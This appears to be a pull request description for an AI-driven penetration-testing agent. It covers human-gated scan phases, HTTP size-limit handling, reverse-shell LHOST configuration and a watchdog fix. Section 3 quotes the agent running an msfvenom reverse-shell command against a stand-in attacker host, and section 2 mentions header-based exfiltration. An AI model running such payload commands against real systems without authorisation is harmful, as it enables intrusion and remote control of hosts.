Phases **never auto-advance** — auto-advancing on a saturation check risked a buggy/early check cutting the deep Phase-A pass short. `maybe_advance_phase` is now advisory-only (records `phase_advice`, never mutates); the operator advances A→B→C via a **dashboard button** (`POST /api/phase/advance`) or a **typed steer** ("advance to phase B" / "next phase", parsed server-side in `/api/steer`). The DRAIN gate keys on the phase, so advancing to B auto-unlocks the sweep fallback. Depth logic untouched.
- Also fixes **BUG A**: `phases._tools_run` read `tool_invocations[].tool` (dispatcher names) while `_RECON_TOOLS` holds scanner names (in `tools_called`), so `_recon_done` was permanently False and the phase could never advance. Now unions both. (Advisory-only under human-gating, but makes the hint truthful.)
- Also fixes a **test-isolation data-loss bug**: `test_api_server.py`'s `/api/clear` tests hit the REAL runtime files, so a full-suite run in a working tree holding a live/completed scan wiped its state. New conftest autouse guard redirects every path `api_clear` touches to tmp (verified byte-identical across a full-suite run).

## 2. http_request aiohttp line-limit + HIR classification (`fix(tools)`)
Raise `max_line_size`/`max_field_size` to 256 KB — the 8190-byte default rejected legitimately-large responses (a huge `token=`/`Set-Cookie` header, or exfil-via-header during exploitation) with `LineTooLong`, which the QA health check then **misread as a target-reachability HIR and halted the scan**. `_is_client_response_size_error()` now classifies these as a client parse limit → non-blocking advisory; genuine network errors still HIR.

## 3. Reverse-shell LHOST handling (`fix(tools)` + skills #59)
The model ran `msfvenom LHOST=attacker.example.com` (placeholder → rejected), then silently switched skills. Now: `SMITH_LHOST` env → `known_assets.attacker_host` (IPv6-aware); a placeholder-LHOST QA guard that points the model at the OOB collaborator / documented dead-end / `wishlist_add`; and prescriptive skill guidance (**0x0pointer/skills#59**).

## 4. Watchdog progress-aware per-scan cap (`fix(watchdog)`)
#156's per-scan cap counted **every** respawn, so a healthy long scan that legitimately respawns 8+ times (headless Smith is one-shot per turn: work → clean exit → respawn) tripped the cap and the watchdog then **suppressed all respawns** — the scan silently stalled and steering stopped being consumed (observed live: 16 respawns, cap firing every 60s, Smith dead). The cap is now **progress-aware**: it resets when the scan advanced since the last respawn, so it counts only **consecutive futile** respawns — a productive long scan is never suppressed; a true runaway still stops.

## Tests
All green — 522 across the affected suites (phases, qa_agent, session, api_smith_endpoints, report_tools), incl. new regression tests for each fix (human-gated advance, IPv6 LHOST, placeholder-LHOST false-positive, progress-reset-at-cap, aiohttp size-error classification, the data-loss guard).

🤖 Generated with [Claude Code](https://claude.com/claude-code)